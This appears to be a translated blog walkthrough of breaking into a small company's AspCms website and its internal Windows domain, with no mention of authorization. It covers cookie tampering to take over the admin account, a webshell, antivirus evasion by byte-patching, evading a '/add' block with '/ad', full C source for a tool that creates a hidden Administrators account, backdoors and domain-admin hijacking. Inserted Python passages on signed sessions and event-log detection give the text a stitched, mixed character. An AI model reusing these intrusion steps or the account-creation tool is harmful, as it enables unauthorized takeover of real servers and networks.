Honestly, the title is more impressive than the article itself. Haha. Let's start today's article.
First, the target site belongs to a small studio company, a fairly small one. The site runs AspCms. The AspCms vulnerabilities were covered in the previous article, so they won't be repeated here. First, register a user.
Then, with a Chrome cookie-editing plug-in, we change the value to admin and change the value of ID to 1.
In this way, we can change the admin password.
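The weakness exploited above is a site that reads the logged-in identity straight out of client-editable cookies. The following Python example is added here for illustration and is not code from the original post or from AspCms: it contrasts that insecure pattern with a server-issued session token whose identity fields are bound to a server-side secret by an HMAC, so editing the cookie no longer changes who you are. The cookie names, the secret key and the sample cookie header are constructed assumptions.

```python
import base64
import hashlib
import hmac
import json
import time
from http.cookies import SimpleCookie
from typing import Optional

# Assumption: a server-side secret that never leaves the server (constructed demo value).
SECRET_KEY = b"constructed-demo-secret-change-me"


def _cookies(cookie_header: str) -> SimpleCookie:
    c = SimpleCookie()
    c.load(cookie_header)
    return c


def current_user_insecure(cookie_header: str) -> dict:
    """The pattern abused in the write-up: identity is read straight out of plain
    cookies, so whoever edits the cookie decides who they are."""
    c = _cookies(cookie_header)
    return {
        "username": c["username"].value if "username" in c else None,
        "id": int(c["id"].value) if "id" in c else None,
    }


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _mac(body: str) -> str:
    return hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()


def issue_session(user_id: int, username: str, ttl: int = 3600,
                  now: Optional[float] = None) -> str:
    """Server-issued token: identity plus expiry, bound to SECRET_KEY by an HMAC."""
    exp = int((now if now is not None else time.time()) + ttl)
    payload = json.dumps({"id": user_id, "u": username, "exp": exp}, separators=(",", ":"))
    body = _b64e(payload.encode())
    return f"{body}.{_mac(body)}"


def verify_session(token: str, now: Optional[float] = None) -> Optional[dict]:
    """Returns the identity only if the MAC matches and the token has not expired."""
    if "." not in token:
        return None
    body, mac = token.rsplit(".", 1)
    if not hmac.compare_digest(mac, _mac(body)):   # constant-time comparison
        return None
    try:
        data = json.loads(_b64d(body))
    except ValueError:                             # bad base64 or bad JSON
        return None
    if data.get("exp", 0) < (now if now is not None else time.time()):
        return None
    return {"id": data["id"], "username": data["u"]}


def current_user_signed(cookie_header: str, now: Optional[float] = None) -> Optional[dict]:
    """Hardened lookup: any other cookie fields (username, id, ...) are simply ignored."""
    c = _cookies(cookie_header)
    return verify_session(c["session"].value, now) if "session" in c else None


def tamper_session(token: str, user_id: int, username: str) -> str:
    """What a client can do without the key: rewrite the payload but keep the old MAC.
    Used here only to show that verify_session rejects the result."""
    body, mac = token.rsplit(".", 1)
    data = json.loads(_b64d(body))
    data["id"], data["u"] = user_id, username
    return f"{_b64e(json.dumps(data, separators=(',', ':')).encode())}.{mac}"


if __name__ == "__main__":
    print(current_user_insecure("username=admin; id=1"))          # edited cookie wins
    tok = issue_session(42, "guest")
    print(current_user_signed(f"session={tok}; username=admin; id=1"))  # still user 42
    print(verify_session(tamper_session(tok, 1, "admin")))          # None
```

The session token carries the identity itself rather than pointing at a database row, which keeps the example self-contained; a server-side session store keyed by a random token is an equally sound alternative. Either way, the point is that the identity the server acts on is never a value the client can rewrite.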
To get a shell on AspCms I won't go through the template-modification route; the IIS 6 parsing vulnerability is used instead.
Running the net user command to list users fails. Obviously,
360 anti-virus is on the server again. Why is 360 installed on a server? Painful.
So we need a reverse shell, but this webshell's reverse-shell function is poor; it doesn't really have one. Another problem is that the server only exposes port 80 externally, and every other port is closed, so a reverse connection started from the webshell can't get out. That way we can't get a reverse shell. Does that mean no reverse shell at all? Not necessarily. We can reuse the port, meaning the reverse shell also goes over port 80, which needs a small program. But the tools don't seem to help, so let's stop there. As for getting past 360: I just grabbed a shell and modified it. I had forgotten how, since I haven't done this for years.
I grabbed a random shell and patched it, changing JBE to JA. OK, it is no longer detected.
Good. Upload the file to the server and run it.
Next is the port. We listen on 80 locally, then send a packet to the server and obtain a shell.
Now we add a user to get past 360's anti-intrusion wall. /add and /ad are equivalent, so adding with /ad directly is not blocked. Of course, you can also compile C code.
// Code by Pnig0s1992
// Date: Maid, 17
// Build as a Unicode project (UNICODE defined) so the TCHAR-based names match LPWSTR.
#include <stdio.h>
#include <Windows.h>
#include <lm.h>
#pragma comment(lib, "Netapi32.lib")

int AddUser(LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName);
int SetGroup(LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName);
BOOL ImprovePriv(LPWSTR name);

int main(int argc, char *argv[])
{
    BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);
    if (argc < 3)
    {
        printf("\nCode by Pnig0s1992");
        printf("\nUsage:");
        printf("\n\t%s UserName Password", argv[0]);
        printf("\n\tRemark: Default add to Group: Administrators.");
        return -1;
    }
    if (bResult)
    {
        printf("Successfully promote priv!");
    }
    else
    {
        printf("Failed promote priv.");
        return -1;
    }
    // The NetAPI calls take wide strings, so convert the ANSI command-line arguments.
    int Namesize = MultiByteToWideChar(CP_ACP, 0, argv[1], -1, NULL, 0);
    wchar_t *wUserName = new wchar_t[Namesize + 1];
    if (!MultiByteToWideChar(CP_ACP, 0, argv[1], -1, wUserName, Namesize))
    {
        return -1;
    }
    int Passsize = MultiByteToWideChar(CP_ACP, 0, argv[2], -1, NULL, 0);
    wchar_t *wPassword = new wchar_t[Passsize + 1];
    if (!MultiByteToWideChar(CP_ACP, 0, argv[2], -1, wPassword, Passsize))
    {
        return -1;
    }
    LPWSTR lpName = wUserName;
    LPWSTR lpPassword = wPassword;
    LPWSTR lpServerName = NULL;               // NULL means the local machine
    LPWSTR lpGroupName = L"Administrators";
    AddUser(lpName, lpPassword, lpServerName);
    SetGroup(lpName, lpServerName, lpGroupName);
    delete[] wUserName;
    delete[] wPassword;
    return 0;
}

// Enables the named privilege on the current process token.
BOOL ImprovePriv(LPWSTR name)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        printf("\nGet process token failed. (%lu)", GetLastError());
        return FALSE;
    }
    TOKEN_PRIVILEGES tkp;
    tkp.PrivilegeCount = 1;
    if (!LookupPrivilegeValue(NULL, name, &tkp.Privileges[0].Luid))
    {
        printf("\nLookup process priv failed. (%lu)", GetLastError());
        return FALSE;
    }
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL))
    {
        printf("\nAdjust process priv failed. (%lu)", GetLastError());
        return FALSE;
    }
    CloseHandle(hToken);
    return TRUE;
}

// Creates a local user through the NetUserAdd API (no net.exe process involved).
int AddUser(LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName)
{
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;
    ui.usri1_name = lpUsername;
    ui.usri1_password = lpPassword;
    ui.usri1_priv = USER_PRIV_USER;           // NetUserAdd requires USER_PRIV_USER here
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;
    ui.usri1_script_path = NULL;
    nStatus = NetUserAdd(lpServerName, dwLevel, (LPBYTE)&ui, &dwError);
    if (nStatus == NERR_Success)
    {
        printf("\nAdd user: %S successfully!", lpUsername);
    }
    else
    {
        printf("\nAdd user failed: %d.", nStatus);
    }
    return 0;
}

// Adds the user to a local group by name (level 3 = domain\name form).
int SetGroup(LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName)
{
    NET_API_STATUS nStatus;
    LOCALGROUP_MEMBERS_INFO_3 lgui;
    lgui.lgrmi3_domainandname = lpUsername;
    nStatus = NetLocalGroupAddMembers(lpServerName, lpGroupName, 3, (LPBYTE)&lgui, 1);
    if (nStatus == NERR_Success)
    {
        printf("\nSuccessfully set USER: %S to GROUP: %S!", lpUsername, lpGroupName);
    }
    else if (nStatus == NERR_GroupNotFound)
    {
        printf("\nCan't find such a group: %S.", lpGroupName);
    }
    else
    {
        printf("\nSet GROUP: %S failed.", lpGroupName);
    }
    return 0;
}
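Two things in the section above matter for anyone defending such a server: a blocklist that matches the literal string "/add" misses the abbreviated "/ad", and a tool that calls NetUserAdd directly never launches net.exe at all. The Python example below is added here and is not code from the original post: it shows a command-line check that normalizes net.exe switch abbreviations, and a log-based check that correlates a user-creation event (4720) with a subsequent addition to the built-in Administrators group (4732, well-known SID S-1-5-32-544), which is generated whichever way the account was created. The sample command lines and event records are constructed; the field names follow the Windows security event schema, and the time values and SIDs are placeholders.

```python
import re
from typing import Dict, Iterable, List

# net.exe or net1.exe, bare or with a full path, case-insensitive.
NET_EXE = re.compile(r"(?:^|[\\/])net1?(?:\.exe)?$", re.IGNORECASE)

# Well-known SID of BUILTIN\Administrators.
ADMIN_GROUP_SID = "S-1-5-32-544"


def _argv(cmdline: str) -> List[str]:
    """Minimal tokenizer: split on whitespace and drop surrounding quotes."""
    return [tok.strip('"') for tok in cmdline.split()]


def is_net_user_add(cmdline: str) -> bool:
    """True when the command line creates an account via net.exe / net1.exe.
    net.exe accepts any unambiguous prefix of a switch, so /ad is treated like /add;
    a one-letter /a is ambiguous with /active and is not counted."""
    argv = _argv(cmdline)
    if len(argv) < 2 or not NET_EXE.search(argv[0]):
        return False
    if argv[1].lower() != "user":
        return False
    for tok in argv[2:]:
        if tok.startswith("/"):
            switch = tok[1:].lower().split(":")[0]
            if len(switch) >= 2 and "add".startswith(switch):
                return True
    return False


def detect_admin_creation(events: Iterable[Dict], window_s: int = 300) -> List[Dict]:
    """Correlates 4720 (account created) with 4732 (member added to local group)
    targeting Administrators within window_s seconds; matching is by SID, so the
    account name used does not matter."""
    created: Dict[str, Dict] = {}
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMIN_GROUP_SID:
            origin = created.get(ev["MemberSid"])
            if origin and ev["time"] - origin["time"] <= window_s:
                alerts.append({
                    "user": origin["TargetUserName"],
                    "sid": ev["MemberSid"],
                    "by": ev["SubjectUserName"],
                    "seconds_between": ev["time"] - origin["time"],
                })
    return alerts


# Constructed sample events; not real log data. Times are seconds on a toy clock.
SAMPLE_EVENTS = [
    {"time": 100, "EventID": 4720, "TargetUserName": "svc_backup",
     "TargetSid": "S-1-5-21-1111-2222-3333-1005", "SubjectUserName": "IUSR_WEB"},
    {"time": 130, "EventID": 4732, "TargetUserName": "Administrators",
     "TargetSid": ADMIN_GROUP_SID, "MemberSid": "S-1-5-21-1111-2222-3333-1005",
     "SubjectUserName": "IUSR_WEB"},
    # Benign: a new account added to Remote Desktop Users, not Administrators.
    {"time": 200, "EventID": 4720, "TargetUserName": "intern",
     "TargetSid": "S-1-5-21-1111-2222-3333-1006", "SubjectUserName": "helpdesk"},
    {"time": 210, "EventID": 4732, "TargetUserName": "Remote Desktop Users",
     "TargetSid": "S-1-5-32-555", "MemberSid": "S-1-5-21-1111-2222-3333-1006",
     "SubjectUserName": "helpdesk"},
    # Benign: a long-existing account promoted, no matching 4720 in the window.
    {"time": 300, "EventID": 4732, "TargetUserName": "Administrators",
     "TargetSid": ADMIN_GROUP_SID, "MemberSid": "S-1-5-21-1111-2222-3333-1001",
     "SubjectUserName": "helpdesk"},
]


if __name__ == "__main__":
    for cmd in ("net user backup P@ss /add", "net user backup P@ss /ad",
                "net user backup /active:yes"):
        print(f"{cmd!r:45} -> {is_net_user_add(cmd)}")
    print(detect_admin_creation(SAMPLE_EVENTS))
```

The command-line check is only as good as the process-creation telemetry feeding it, which is exactly why the event-based correlation is the more robust of the two: the C tool above produces no net.exe process, but it still produces a 4720 followed by a 4732, and the subject account on those events (here a web-server identity) is itself a strong signal.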
Well... OK. Let's continue.
With a user, we can try sniffing. Unfortunately, no luck.
Since that doesn't work, let's look at intranet penetration.
A Windows executable backdoor.
Then we call the module to listen and obtain a session.
Next comes intranet penetration: call a module.
Then let's look at the domain and find the domain admin.
Let's hijack the domain admin.
Obtain the shell, and then look at the domain.
Time for the domain admin.
Then we schedule our backdoor program to execute two minutes later.
OK, session obtained. Then you have domain control, you know.